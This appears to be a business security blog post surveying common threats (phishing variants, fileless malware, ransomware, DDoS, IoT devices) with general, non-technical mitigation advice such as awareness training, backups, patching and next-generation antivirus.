Businesses now face a multitude of cybersecurity threats, and cyber threats are one of the riskiest for the organization. Market analysts from Juniper Research suggest that global cybercrime will cost businesses more than $2.1 trillion by 2019. Not only is money at stake but also brand reputation and customer loyalty. Just look at recent cyberattacks on enterprise organizations like Equifax, Uber, Target, Home Depot, and many others. If you operate a small or mid-size business, the outlook could be even worse. SMBs are becoming a big target for cybercriminals as enterprise organizations up their defense strategies.
Regardless of the size of your organization, it’s important to be aware of the top cybersecurity threats emerging and threatening all businesses. In this blog, you will learn more about the top cybersecurity risks that many organizations now face and way in which to mitigate the risk.
Spear Phishing/Smishing/Vishing/Whaling Scams
Astonishingly, four out of ten end users still cannot identify if an email message is fake and will guess whether the content is real or malicious. Moreover, 91% of cyberattacks start with a phishing email. Cybercriminals use social engineering tactics to succeed in accessing your organization’s data and wreaking havoc on your business. Most end users will open the phishing emails out of curiosity, fear, or urgency.
Cybercriminals often study the behavior of their victims and circle of influence. The hacker does this to create even more sophisticated social engineering tactics. Are you familiar with the following phishing schemes?
- Spear Phishing – A type of phishing attempt that targets a select group of users or business departments in a process known as social engineering. To execute spear phishing, a cybercriminal thoroughly studies a group of end users to understand their online behaviors and circle of influence in their professional circle and social networks. This process is called social engineering. This type of fake message uses graphics and content features that increase its relevance and credibility.
- Smishing – SMS Phishing or “Smishing” uses SMS messages to forward fake URLs (virtual addresses) to the user. By taking advantage of the increasing use of smart devices, the victim inadvertently clicks on the fake URL and is directed to a data collection site, where their identity is stolen, right out of the palm of their hands.
- Vishing – This is an abbreviation for Voice Phishing, where the victim is induced to make a call to the criminal who then simulates, for example, a customer service center and gains access to the victim’s data over the phone.
- Whaling – In this social engineering tactic, a cybercriminal targets the Chief Executive Officer or other high-profile executives within the company to expunge highly sensitive data.
To mitigate hese various phishing attempts, your organization should regularly perform phishing simulations and security awareness training so that employees know how to discern a real email from a phishing attempt. Also, employees should be encouraged to report any phishing email threats directly to their IT security team. Doing so has been proven to reduce the Mean Time to Detect.
Malware and Advanced Persistent Threats
Malware is a common cybersecurity threat used by cybercriminals to inject devices and networks. Viruses, Trojans, and other malicious software are often used for financial gain and power. Malware usually is undetected by the network and will attempt to steal as much data without leaving any trace of its activity.
Hackers have developed a new type of malware, called “fileless” malware or memory-based malware, which is becoming a major security challenge. Unlike traditional malware, a fileless malware does not use or write to any files. Instead, the malware code is injected into the RAM or the registry. It often flies under the detection of traditional anti-malware software because it can take advantage of a web browser of Office application vulnerability. Fileless malware can be created from scripts, like PowerShell or Windows Management Instrumentation (WMI), to infect a device.
To mitigate against the latest malware threats, it’s important to have both traditional and next-generation antivirus (NGAV or Next-Gen AV) products in place. Traditional anti-virus is the most prevalent solution for protecting your organization against known malware. However, for new malware and zero-day exploits, next-generation anti-virus monitors your device behavior and identifies any anomalous activity without a query to a signature database of vaccines. Next-gen AV can protect your endpoints from zero-day exploits by monitoring endpoints in real-time. Traditional anti-virus does not do this scanning in real-time.
Ransomware dominated the news headlines in 2016 and 2017. Ransomware like Locky, WannaCry, Petya/NotPetya caused every day more than 4,000 businesses and individuals to lose productivity and their data. Ransomware is a malicious malware that can block a user’s access to a device or data until a ransom is paid. Ransomware applies encryption on the user’s device or data and essentially locks them out of their device.
The unfortunate landscape is that more than 75% of organizations that are targeted by ransomware still do not have a security solution or strategies in place to prevent these incidents. As a security practitioner, you can take various steps to mitigate ransomware, including:
- Phishing training – we learned from above that phishing is the most common tactic for malware and ransomware delivery
- Back up your data – the only way to recover your data is to have a secure backup solution in place in the event of a successful ransomware attack
- Patch management – patching is an overlooked process that reduces your vulnerabilities. The problem is there are often so many patches issued that IT departments have a tough time keeping up with it.
Here’s a simple 10 step process for patch management.
Ransomware attacks can be relieved with information security best practices. Implementing these best practices puts up a layered defense in your security program.
Distributed Denial of Service (DDoS) Attacks
DDoS attacks dramatically increased over the last two years. In 2016, many DNS providers in the United States were hit by DDoS hackers on October 21, 2016, which left many organizations with significant downtime. Distributed denial of service (DDoS) attacks is now a big threat to any business with a web presence. No matter what size business you operate, it could be just a matter of time before you deal an inevitable DDoS attack. Here are three types of DDoS attack methods:
- Network-level – hackers will disrupt your network, website, or online service to the Internet. They send huge amounts of traffic to overwhelm your network connection capacity until systems become unavailable
- Protocol attacks – Firewall and load balancer resources are used and consumed by the DDoS hacker or the DDoS bots used in the attack
- Application level – hackers will overload application resources in an attempt to crash a website application completely and bring the website down.
To mitigate these attack types, you should have adequate defenses already in place and most important a strong DDoS playbook in place. Your DDoS playbook will outline a complete strategy for DDoS mitigation, from identifying an attack, responding to a DDoS ransomware, and the technology used to detect a DDoS attack.
Internet of Things
There’s unprecedented growth within the Internet of Things (IoT) space. There are connected devices across every aspect of everyday life, from fitness, cars, health monitoring, and industrial control systems. But, with every new IoT devices that connects online, it adds even more complexity and security challenges for an organization. Moreover, offering Bring Your Own Device (BYOD) policies also brings highly vulnerable IoT devices on to the network. Many IoT devices are not engineered with Security by Design and rushed to market without a plan for regular firmware updates to patch vulnerabilities.
To mitigate IoT vulnerabilities, organizations should inventory all assets on the network and even consider mandating that any BYOD device is on a guest wireless network. In addition, organizations may want to consider investing in a discovery tool that can monitor networks, detect any unknown devices and disconnect it from the network if the connected device has critical vulnerabilities.
How to Mitigate the Top Cybersecurity Threats
Your business can encounter many different forms of cybersecurity threats. It’s important to start building information security best practices and policy, educate your users, and invest in security technology solutions that will compliment your cybersecurity strategies. If you can build a layered or Defense-in-Depth approach to your security, you will be in a much better place to lower your Mean Time to Detect and Mean Time to Respond.